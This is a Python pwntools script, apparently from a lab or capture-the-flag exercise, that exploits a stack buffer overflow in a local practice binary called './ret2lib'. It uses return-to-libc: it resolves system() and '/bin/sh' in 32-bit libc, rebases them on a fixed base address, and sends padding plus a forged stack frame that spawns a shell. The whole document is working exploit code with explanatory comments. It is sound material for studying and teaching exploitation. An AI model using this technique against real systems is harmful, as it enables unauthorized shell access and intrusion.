#!/usr/bin/python

from pwn import *


# Base address libc is assumed to be mapped at for this lab run. It is a
# fixed constant, so every address derived from it below is only correct
# while the loader places libc exactly here; if the layout is randomised
# the computed pointers will not line up.
libc_address = 0xF7D89000


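def main():
    """Build and deliver a return-to-libc frame to the local ``./ret2lib`` binary.

    The script resolves ``system`` and the ``"/bin/sh"`` string inside the
    system libc, rebases them onto the hard-coded ``libc_address``, starts
    the practice binary, and sends a payload consisting of padding followed
    by the classic ``system`` / return-slot / argument triple. It then hands
    the process over to the user.

    Side effects: writes progress to the pwntools log, spawns ``./ret2lib``,
    blocks on ``raw_input`` (Python 2, matching the shebang) and on the
    interactive session.

    Raises:
        StopIteration: if the ``"/bin/sh\\x00"`` string is not present in
            the libc image that was parsed.
    """
    e = ELF('/lib/i386-linux-gnu/libc.so.6')

    log.info("libc base address: %#x" % libc_address)

    # Offsets are relative to the start of the ELF; they become absolute
    # only after adding the assumed base below.
    system_offset = e.symbols['system']
    bin_sh_offset = next(e.search(b'/bin/sh\x00'))

    log.info("system() offset: %#x" % system_offset)
    log.info("/bin/sh offset: %#x" % bin_sh_offset)

    system_address = libc_address + system_offset
    bin_sh_address = libc_address + bin_sh_offset
    log.info("system() address: %#x" % system_address)
    # Bug fix: this line previously logged system_address a second time,
    # so the /bin/sh address was never actually shown.
    log.info("/bin/sh address: %#x" % bin_sh_address)

    # start the process
    p = process("./ret2lib")

    # print the pid and pause — presumably so a debugger can be attached
    # before the payload lands; raw_input is the Python 2 builtin.
    raw_input(str(p.proc.pid))

    # craft the payload: 76 bytes of filler (presumably the distance to the
    # saved return address for this binary — confirm against it), then the
    # address system() is returned into, the slot system() itself returns
    # to, and the single argument it reads from the stack.
    payload = b"A" * 76
    payload += p32(system_address)
    payload += p32(0x41414141) # junk data, you can put exit() address here to let it exit gracefully
    payload += p32(bin_sh_address)

    # send the payload
    p.send(payload)

    # pass interaction to the user
    p.interactive()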

# Script entry point: only run when executed directly, not on import.
if __name__ == '__main__':
    main()

